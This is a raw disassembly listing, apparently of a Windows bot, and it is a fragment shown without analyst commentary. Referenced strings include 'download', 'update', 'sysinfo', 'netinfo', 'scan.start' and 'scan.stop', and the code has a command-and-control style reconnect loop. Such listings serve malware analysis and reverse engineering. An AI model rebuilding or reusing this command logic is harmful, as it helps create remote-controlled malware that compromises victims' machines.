push dword ptr [esp+355h]
push edi
call sub_417361
add esp, 10h
loc_41BB5E: ; CODE XREF: .kSjx934:0041BAA7�j
; .kSjx934:0041BB3B�j
call ds:dword_41D0E0
push eax
call sub_414042
pop ecx
mov ecx, [esp+75Ch]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB84 proc near ; CODE XREF: .kSjx934:0041C3B5�p
; .kSjx934:0041C3D1�p ...
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_104]
push 100h
push eax
mov dword ptr [esi], offset off_420A74
mov [ebp+var_108], esi
call sub_402AEE
mov eax, ds:dword_433C40
add esp, 0Ch
lea edx, [ebp+var_108]
push edx
mov ecx, offset dword_433C3C
push eax
push ecx
call sub_40121E
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_41BB84 endp
; ---------------------------------------------------------------------------
loc_41BBE3: ; CODE XREF: .kSjx934:004040AA�p
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 724h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+720h], eax
mov eax, [ebp+10h]
push ebx
push esi
push edi
mov [esp+10h], eax
call sub_419677
test al, al
jz short loc_41BC29
loc_41BC10: ; CODE XREF: .kSjx934:0041BDA1�j
; .kSjx934:0041BDCC�j ...
mov ecx, [esp+72Ch]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_41BC29: ; CODE XREF: .kSjx934:0041BC0E�j
call sub_4195EC
test al, al
jnz loc_41C061
call ds:dword_41D090
test eax, eax
jnz loc_41C061
mov esi, offset aIrn ; "--irn "
lea edi, [esp+248h]
movsd
movsw
movsb
mov edi, 103h
xor ebx, ebx
push edi
lea eax, [esp+625h]
push ebx
push eax
mov [esp+62Ch], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+415h]
push ebx
push eax
mov [esp+41Ch], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+30Dh]
push ebx
push eax
mov [esp+314h], bl
call sub_407B70
add esp, 0Ch
push 7Fh
lea eax, [esp+28Dh]
push ebx
push eax
mov [esp+294h], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+624h]
push eax
call ds:dword_41D0F4
push 80h
lea esi, [esp+28Ch]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
mov eax, esi
push eax
lea eax, [esp+624h]
push eax
push offset aSS_5 ; "%s\\%s"
lea eax, [esp+314h]
push edi
push eax
call sub_402AEE
lea eax, [esp+31Ch]
add esp, 14h
lea ecx, [eax+1]
loc_41BD11: ; CODE XREF: .kSjx934:0041BD16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41BD11
sub eax, ecx
xor ebx, ebx
mov [esp+eax+308h], bl
mov esi, 104h
push esi
lea eax, [esp+414h]
push eax
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
lea eax, [esp+248h]
lea ecx, [eax+1]
loc_41BD49: ; CODE XREF: .kSjx934:0041BD4E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41BD49
sub eax, ecx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call sub_4029E9
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push ebx
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call ds:dword_41D080
test eax, eax
jz loc_41BC10
lea eax, [esp+410h]
push eax
lea eax, [esp+24Ch]
push eax
lea eax, [esp+310h]
push eax
push offset aSSS_0 ; "%s %s%s"
call sub_419219
add esp, 10h
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41BDD1: ; CODE XREF: .kSjx934:0041BD69�j
; .kSjx934:0041BD86�j
lea eax, [esp+248h]
lea edx, [eax+1]
loc_41BDDB: ; CODE XREF: .kSjx934:0041BDE0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BDDB
sub eax, edx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz loc_41BE8C
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_41BE8C
push edi
lea eax, [esp+51Dh]
push ebx
push eax
mov [esp+524h], bl
call sub_407B70
lea eax, [esp+254h]
add esp, 0Ch
lea edi, [eax+1]
loc_41BE41: ; CODE XREF: .kSjx934:0041BE46�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BE41
mov ecx, [esp+10h]
sub eax, edi
add eax, ecx
push eax
push offset aS_11 ; "%s"
lea eax, [esp+520h]
push esi
push eax
call sub_402AEE
add esp, 10h
xor esi, esi
loc_41BE69: ; CODE XREF: .kSjx934:0041BE8A�j
lea eax, [esp+518h]
push eax
call ds:dword_41D0D0
test eax, eax
jnz short loc_41BE8C
push 0C8h
call ds:dword_41D0FC
inc esi
cmp esi, 3
jb short loc_41BE69
loc_41BE8C: ; CODE XREF: .kSjx934:0041BDFB�j
; .kSjx934:0041BE1C�j ...
push 80h
lea eax, [esp+28Ch]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 37h
lea eax, [esp+255h]
push ebx
push eax
mov [esp+25Ch], bl
call sub_407B70
add esp, 0Ch
push 38h
lea esi, [esp+254h]
mov ebx, offset byte_4250E1
call sub_4196D1
pop ecx
mov eax, esi
push eax
push 1
xor ebx, ebx
push ebx
call ds:dword_41D084
push 38h
mov esi, eax
lea eax, [esp+254h]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 1388h
push esi
call ds:dword_41D07C
cmp eax, 102h
jnz short loc_41BF0D
push ebx
call ds:dword_41D050
loc_41BF0D: ; CODE XREF: .kSjx934:0041BF04�j
call sub_416F86
push 8
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF31
push offset sub_417119
xor ecx, ecx
mov edi, offset aRm ; "RM"
mov esi, eax
call sub_4140AB
loc_41BF31: ; CODE XREF: .kSjx934:0041BF1C�j
lea eax, [esp+20h]
push eax
mov dword ptr [esp+24h], 94h
call ds:dword_41D068
cmp dword ptr [esp+24h], 4
jz short loc_41BF6A
push 8
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF6A
push offset sub_419EA0
xor ecx, ecx
mov edi, offset aBk ; "BK"
mov esi, eax
call sub_4140AB
loc_41BF6A: ; CODE XREF: .kSjx934:0041BF49�j
; .kSjx934:0041BF55�j
push 8
mov ds:byte_4269C0, bl
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF8F
push offset sub_418301
xor ecx, ecx
mov edi, offset aUnm ; "UNM"
mov esi, eax
call sub_4140AB
loc_41BF8F: ; CODE XREF: .kSjx934:0041BF7A�j
lea eax, [esp+0B8h]
push eax
push 202h
call ds:dword_41D274
test eax, eax
jnz loc_41C056
call sub_4192FB
mov ds:byte_433945, bl
call sub_41B775
mov eax, [ebp+8]
mov ds:byte_4268B4, bl
mov ds:dword_4266A4, eax
call sub_418D17
mov eax, ds:dword_433C40
mov eax, [eax]
mov ebx, offset dword_433C3C
mov [esp+14h], eax
mov [esp+10h], ebx
loc_41BFE1: ; CODE XREF: .kSjx934:0041C00C�j
cmp dword ptr [esp+10h], 0
mov esi, ds:dword_433C40
jz short loc_41BFF4
cmp [esp+10h], ebx
jz short loc_41BFF9
loc_41BFF4: ; CODE XREF: .kSjx934:0041BFEC�j
call sub_402F5D
loc_41BFF9: ; CODE XREF: .kSjx934:0041BFF2�j
cmp [esp+14h], esi
jz short loc_41C00E
lea edi, [esp+18h]
lea esi, [esp+10h]
call sub_40168C
jmp short loc_41BFE1
; ---------------------------------------------------------------------------
loc_41C00E: ; CODE XREF: .kSjx934:0041BFFD�j
mov esi, offset dword_4269BC
loc_41C013: ; CODE XREF: .kSjx934:0041C054�j
movsx eax, ds:word_424E48
push eax
push offset dword_424C48
mov edx, offset dword_424A48
mov ecx, esi
call sub_41802F
test al, al
jz short loc_41C042
mov ds:byte_4269C0, 1
loc_41C037: ; CODE XREF: .kSjx934:0041C040�j
mov ecx, esi
call sub_417F01
test al, al
jnz short loc_41C037
loc_41C042: ; CODE XREF: .kSjx934:0041C02E�j
push 3A98h
mov ds:byte_4269C0, 0
call ds:dword_41D0FC
jmp short loc_41C013
; ---------------------------------------------------------------------------
loc_41C056: ; CODE XREF: .kSjx934:0041BFA4�j
call ds:dword_41D244
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41C061: ; CODE XREF: .kSjx934:0041BC30�j
; .kSjx934:0041BC3E�j
push offset byte_41EF17
call sub_419477
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_41C070 proc near ; CODE XREF: sub_418DA0+2F�p
; sub_418DA0+6C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_41C091
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_41C091: ; CODE XREF: sub_41C070+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41C0AD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41C0AD: ; CODE XREF: sub_41C070+27�j
or eax, eax
jnz short loc_41C0C9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41C10A
; ---------------------------------------------------------------------------
loc_41C0C9: ; CODE XREF: sub_41C070+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41C0D7: ; CODE XREF: sub_41C070+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41C0D7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41C105
cmp edx, [esp+0Ch+arg_4]
ja short loc_41C105
jb short loc_41C106
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41C106
loc_41C105: ; CODE XREF: sub_41C070+85�j
; sub_41C070+8B�j
dec esi
loc_41C106: ; CODE XREF: sub_41C070+8D�j
; sub_41C070+93�j
xor edx, edx
mov eax, esi
loc_41C10A: ; CODE XREF: sub_41C070+57�j
dec edi
jnz short loc_41C114
neg edx
neg eax
sbb edx, 0
loc_41C114: ; CODE XREF: sub_41C070+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_41C070 endp
; ---------------------------------------------------------------------------
align 10h
cmp ds:dword_433C7C, 0
jz short sub_41C156
loc_41C129: ; CODE XREF: .kSjx934:0041C154�j
push ebp
mov ebp, esp
sub esp, 8
and esp, 0FFFFFFF8h
fstp qword ptr [esp]
cvttsd2si eax, qword ptr [esp]
leave
retn
; ---------------------------------------------------------------------------
cmp ds:dword_433C7C, 0
jz short sub_41C156
sub esp, 4
fnstcw word ptr [esp]
pop eax
and ax, 7Fh
cmp ax, 7Fh
jz short loc_41C129
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C156 proc near ; CODE XREF: sub_41A9DE+5AB�p
; .kSjx934:0041C127�j ...
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_41C1B5
loc_41C179: ; CODE XREF: sub_41C156+69�j
fsubp st(1), st
test edx, edx
jns short loc_41C19D
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_41C1C9
; ---------------------------------------------------------------------------
loc_41C19D: ; CODE XREF: sub_41C156+27�j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_41C1C9
; ---------------------------------------------------------------------------
loc_41C1B5: ; CODE XREF: sub_41C156+21�j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_41C179
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_41C1C9: ; CODE XREF: sub_41C156+45�j
; sub_41C156+5D�j
leave
retn
sub_41C156 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_4212B8
jmp loc_40428E
; ---------------------------------------------------------------------------
loc_41C1EE: ; DATA XREF: sub_40B4B4+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421658
jmp loc_40428E
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-1Ch]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AB8
jmp loc_40428E
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_402CCA
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AE8
jmp loc_40428E
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-58h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B18
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C274: ; DATA XREF: sub_41B775+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A00
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C299: ; DATA XREF: sub_418D17+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A2C
jmp loc_40428E
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B48
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-58h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-70h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B78
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4BCh]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BA8
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4C0h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BD8
jmp loc_40428E
; ---------------------------------------------------------------------------
loc_41C370: ; DATA XREF: .kSjx934:0041D28C�o
call sub_401291
and ds:dword_433C44, 0
push offset loc_41C498
mov ds:dword_433C40, eax
call sub_402E21
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C38D: ; DATA XREF: .kSjx934:0041D290�o
call sub_40172D
and ds:dword_433C50, 0
push offset loc_41C4E1
mov ds:dword_433C4C, eax
call sub_402E21
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C3AA: ; DATA XREF: .kSjx934:0041D294�o
push esi
push offset aDownload ; "download"
mov esi, offset dword_433C58
call sub_41BB84
mov ds:dword_433C58, offset off_420AE4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3C6: ; DATA XREF: .kSjx934:0041D298�o
push esi
push offset aUpdate ; "update"
mov esi, offset dword_433C54
call sub_41BB84
mov ds:dword_433C54, offset off_420AEC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3E2: ; DATA XREF: .kSjx934:0041D29C�o
push esi
push offset aHttp ; "http"
mov esi, offset dword_433C5C
call sub_41BB84
mov ds:dword_433C5C, offset off_420B04
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3FE: ; DATA XREF: .kSjx934:0041D2A0�o
push esi
push offset aSysinfo ; "sysinfo"
mov esi, offset dword_433C60
call sub_41BB84
mov ds:dword_433C60, offset off_420BC4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C41A: ; DATA XREF: .kSjx934:0041D2A4�o
push esi
push offset aNetinfo ; "netinfo"
mov esi, offset dword_433C64
call sub_41BB84
mov ds:dword_433C64, offset off_420BCC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C436: ; DATA XREF: .kSjx934:0041D2A8�o
mov eax, ds:dword_424644
add eax, 6
mov ds:dword_433C68, eax
retn
; ---------------------------------------------------------------------------
loc_41C444: ; DATA XREF: .kSjx934:0041D2AC�o
push esi
push offset aScan_start ; "scan.start"
mov esi, offset dword_433C74
call sub_41BB84
mov ds:dword_433C74, offset off_420D1C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C460: ; DATA XREF: .kSjx934:0041D2B0�o
push esi
push offset aScan_stop ; "scan.stop"
mov esi, offset dword_433C6C
call sub_41BB84
mov ds:dword_433C6C, offset off_420D24
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C47C: ; DATA XREF: .kSjx934:0041D2B4�o
push esi
push offset dword_41EEF0
mov esi, offset dword_433C70
call sub_41BB84
mov ds:dword_433C70, offset off_420D2C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C498: ; DATA XREF: .kSjx934:0041C37C�o
mov eax, ds:dword_433C40
mov ecx, [eax]
mov [eax], eax
mov eax, ds:dword_433C40
mov [eax+4], eax
and ds:dword_433C44, 0
cmp ecx, ds:dword_433C40
jz short loc_41C4CD
push esi
loc_41C4B9: ; CODE XREF: .kSjx934:0041C4CA�j
mov esi, [ecx]
push ecx
call sub_402F6D
cmp esi, ds:dword_433C40
pop ecx
mov ecx, esi
jnz short loc_41C4B9
pop esi
loc_41C4CD: ; CODE XREF: .kSjx934:0041C4B6�j
push ds:dword_433C40
call sub_402F6D
and ds:dword_433C40, 0
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C4E1: ; DATA XREF: .kSjx934:0041C399�o
mov eax, ds:dword_433C4C
mov ecx, [eax]
mov [eax], eax
mov eax, ds:dword_433C4C
mov [eax+4], eax
and ds:dword_433C50, 0
cmp ecx, ds:dword_433C4C
jz short loc_41C516
push esi
loc_41C502: ; CODE XREF: .kSjx934:0041C513�j
mov esi, [ecx]
push ecx
call sub_402F6D
cmp esi, ds:dword_433C4C
pop ecx
mov ecx, esi
jnz short loc_41C502
pop esi
loc_41C516: ; CODE XREF: .kSjx934:0041C4FF�j
push ds:dword_433C4C
call sub_402F6D
and ds:dword_433C4C, 0
pop ecx
retn
; ---------------------------------------------------------------------------
mov ds:dword_425A84, offset off_41D314
mov ecx, offset dword_425A84
jmp sub_402CCA
; ---------------------------------------------------------------------------
align 1000h
_kSjx934 ends
; Section 2. (virtual address 0001D000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 0001D000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_kSjx934 segment para public 'BSS' use32
assume cs:_kSjx934
;org 41D000h
assume es:nothing, ss:nothing, ds:_kSjx934, fs:nothing, gs:nothing
dword_41D000 dd 381762h ; DATA XREF: sub_416F32+39�r
dword_41D004 dd 38179Bh ; DATA XREF: sub_416E5F+1D�r
; sub_416F32+1B�r
dword_41D008 dd 3817EBh ; DATA XREF: sub_416ECD+31�r
dword_41D00C dd 38183Fh ; DATA XREF: sub_416E5F+52�r
dword_41D010 dd 381872h ; DATA XREF: sub_416E5F+2A�r
; sub_416E5F+60�r ...
dword_41D014 dd 381894h ; DATA XREF: sub_419835+3C�r
dword_41D018 dd 3818E7h ; DATA XREF: sub_419C6D+A5�r
; sub_419C6D+1B6�r
dword_41D01C dd 38191Bh ; DATA XREF: sub_419760+82�r
dword_41D020 dd 38193Fh ; DATA XREF: sub_419A9F+132�r
dword_41D024 dd 381991h ; DATA XREF: sub_419C1D+C�r
dword_41D028 dd 3819B5h ; DATA XREF: sub_419760+24�r
dword_41D02C dd 3819E8h ; DATA XREF: sub_416ECD+14�r
; sub_419A9F+90�r ...
dword_41D030 dd 381A42h ; DATA XREF: sub_419EA0+299�r
dword_41D034 dd 381A67h ; DATA XREF: sub_419835+19�r
dword_41D038 dd 381ABEh ; DATA XREF: sub_419EA0+27D�r
dword_41D03C dd 381AF9h ; DATA XREF: sub_419C1D+2E�r
dword_41D040 dd 381B1Dh ; DATA XREF: sub_419C1D+3B�r
dword_41D044 dd 381B41h ; DATA XREF: sub_419C1D+1E�r
dd 381B65h, 0
dword_41D050 dd 380000h ; DATA XREF: sub_4078A7+E�r
; sub_419477+168�r ...
dword_41D054 dd 380045h ; DATA XREF: sub_4102B0+22�r
; sub_418E1F+29�r
dword_41D058 dd 380099h ; DATA XREF: sub_40B08A+5D�r
; sub_418DA0+B�r
dword_41D05C dd 3800E4h ; DATA XREF: sub_419219+8B�r
dword_41D060 dd 380162h ; DATA XREF: sub_409AB4+99�r
; sub_40AE54+2A�r ...
dword_41D064 dd 3801C6h ; DATA XREF: sub_418DA0+19�r
dword_41D068 dd 380230h ; DATA XREF: .kSjx934:00403F86�r
; sub_418E51+24�r ...
dword_41D06C dd 380296h ; DATA XREF: sub_40E072+234�r
; sub_41142B+13�r ...
dword_41D070 dd 3802CCh ; DATA XREF: sub_418552+31E�r
dword_41D074 dd 38031Eh ; DATA XREF: sub_40CCBE+40�r
; sub_41075B+2D�r ...
dword_41D078 dd 38035Ch ; DATA XREF: sub_409DAD+17F�r
; sub_409DAD+2A3�r ...
dword_41D07C dd 380380h ; DATA XREF: sub_4140AB+5E�r
; sub_41A9DE+6CD�r ...
dword_41D080 dd 3803B2h ; DATA XREF: .kSjx934:0041BD99�r
dword_41D084 dd 3803F8h ; DATA XREF: .kSjx934:0041BED8�r
dword_41D088 dd 380440h ; DATA XREF: sub_409AB4+194�r
; sub_40CE5A+212�r ...
dword_41D08C dd 380464h ; DATA XREF: sub_41B3D0+20�r
; sub_41B5D2+43�r
dword_41D090 dd 380489h ; DATA XREF: sub_40468E+B9�r
; sub_419477+16F�r ...
dword_41D094 dd 3804AAh ; DATA XREF: sub_414023+8�r
dd 3804C8h
dword_41D09C dd 380530h ; DATA XREF: sub_41A9DE+63F�r
dword_41D0A0 dd 380579h ; DATA XREF: sub_409DAD+3E7�r
; sub_40BF57:loc_40C004�r ...
dword_41D0A4 dd 3805C8h ; DATA XREF: sub_41A5C1+2C3�r
dword_41D0A8 dd 3805F1h ; DATA XREF: sub_4105A7+14C�r
dword_41D0AC dd 380640h ; DATA XREF: sub_4104DC+45�r
dword_41D0B0 dd 380686h ; DATA XREF: sub_4104DC+78�r
dword_41D0B4 dd 38070Fh ; DATA XREF: sub_4104DC+9B�r
dword_41D0B8 dd 380748h ; DATA XREF: sub_40F04F+8C�r
dword_41D0BC dd 38079Ah ; DATA XREF: sub_40EC7F:loc_40ECD3�r
; sub_40ECFC:loc_40ED54�r
dword_41D0C0 dd 3807D1h ; DATA XREF: sub_4195EC+39�r
dword_41D0C4 dd 3807F6h ; DATA XREF: sub_4195EC+50�r
dword_41D0C8 dd 380864h ; DATA XREF: sub_4195EC+6F�r
dword_41D0CC dd 38089Ah ; DATA XREF: sub_40468E+F5�r
; sub_4195EC+13�r
dword_41D0D0 dd 3808B0h ; DATA XREF: sub_419E55+20�r
; .kSjx934:0041BE71�r
dword_41D0D4 dd 3808CEh ; DATA XREF: sub_419948+3B�r
dword_41D0D8 dd 380906h ; DATA XREF: sub_4199AC+3B�r
dword_41D0DC dd 380942h ; DATA XREF: sub_408A4D+4B�r
; sub_40E072+29C�r ...
dword_41D0E0 dd 38097Ch ; DATA XREF: sub_40531A+60�r
; sub_4054D6+169�r ...
dword_41D0E4 dd 380994h ; DATA XREF: sub_405127+39�r
; sub_405193+39�r ...
dword_41D0E8 dd 3809BAh ; DATA XREF: sub_40F524+2D�r
; sub_419677+30�r ...
dword_41D0EC dd 3809E9h ; DATA XREF: sub_405127+49�r
; sub_405193+49�r ...
dword_41D0F0 dd 380A40h ; DATA XREF: sub_40531A+2�r
; sub_408A4D+55�r ...
dword_41D0F4 dd 380A60h ; DATA XREF: sub_416F86+D1�r
; sub_417119+A6�r ...
dword_41D0F8 dd 380AB6h ; DATA XREF: sub_40468E+FC�r
; sub_419E55+8�r
dword_41D0FC dd 380AD3h ; DATA XREF: sub_40773A+1D�r
; sub_40777A+25�r ...
dword_41D100 dd 380AFEh ; DATA XREF: .kSjx934:00403F61�r
; sub_4105A7+67�r ...
dword_41D104 dd 380B2Dh ; DATA XREF: sub_419EA0:loc_41A108�r
dword_41D108 dd 380B40h ; DATA XREF: sub_40B08A+51�r
; sub_41748B+36�r ...
dword_41D10C dd 380B6Bh ; DATA XREF: .kSjx934:00403F96�r
; .kSjx934:00403FBF�r ...
dword_41D110 dd 380BA0h ; DATA XREF: sub_4140AB+1C�r
; sub_41B5D2+161�r
dword_41D114 dd 380BF6h ; DATA XREF: sub_4036E0+F�r
; .kSjx934:00403F6A�r ...
dword_41D118 dd 380C1Dh ; DATA XREF: sub_40CE5A+11D�r
dword_41D11C dd 380C45h ; DATA XREF: sub_40CE5A:loc_40CF93�r
dword_41D120 dd 380CBDh ; DATA XREF: .kSjx934:0040CB08�r
dword_41D124 dd 380CD3h ; DATA XREF: sub_40C33C+2D�r
; sub_40C33C+11C�r
dword_41D128 dd 380D1Eh ; DATA XREF: sub_40C33C+191�r
dword_41D12C dd 380D63h ; DATA XREF: sub_40BF57+30�r
; sub_40BF57+144�r ...
dword_41D130 dd 380DC4h ; DATA XREF: sub_40BF57+294�r
; sub_40BF57+365�r
dword_41D134 dd 380E24h ; DATA XREF: sub_40AF0D+B�r
dword_41D138 dd 380E59h ; DATA XREF: sub_40AF0D:loc_40AF87�r
; sub_40BF57+216�r ...
dword_41D13C dd 380E90h ; DATA XREF: sub_40AF0D+CC�r
dword_41D140 dd 380EADh ; DATA XREF: sub_40AF0D:loc_40AFEB�r
dword_41D144 dd 380F22h ; DATA XREF: sub_40AF0D+10F�r
; sub_40AF0D+126�r
dword_41D148 dd 380F64h ; DATA XREF: sub_4087E0+12B�r
; sub_4087E0+1C7�r ...
dword_41D14C dd 380FBCh ; DATA XREF: sub_4087E0+1B5�r
; sub_409AB4+169�r
dword_41D150 dd 380FFAh ; DATA XREF: sub_4087E0+21F�r
dword_41D154 dd 381014h ; DATA XREF: sub_405E64+27�r
; sub_40DA6D+134�r ...
dword_41D158 dd 381041h ; DATA XREF: sub_405E64+77�r
; sub_405F14+52�r
dword_41D15C dd 381091h ; DATA XREF: sub_405B50+22F�r
dword_41D160 dd 3810C5h ; DATA XREF: sub_405A83+11�r
dword_41D164 dd 381136h ; DATA XREF: sub_405A83+47�r
dword_41D168 dd 38116Bh ; DATA XREF: sub_4059F7+28�r
; sub_40815B+28�r ...
dword_41D16C dd 38119Ah ; DATA XREF: sub_40591F+D�r
; sub_4081AD+28�r ...
dword_41D170 dd 3811C4h ; DATA XREF: sub_4058CA+1�r
; sub_40DFD3+62�r
dword_41D174 dd 3811EEh ; DATA XREF: sub_40531A+78�r
; sub_40CB14+AB�r
dword_41D178 dd 38121Eh ; DATA XREF: sub_405229+2B�r
; sub_4054D6+85�r
dword_41D17C dd 38124Ch ; DATA XREF: sub_4051FF+23�r
; sub_4054D6+58�r
dword_41D180 dd 38128Dh ; DATA XREF: sub_4051F6�r
; sub_4054D6:loc_405575�r
dword_41D184 dd 3812B7h ; DATA XREF: sub_405127+7�r
; sub_405193+7�r ...
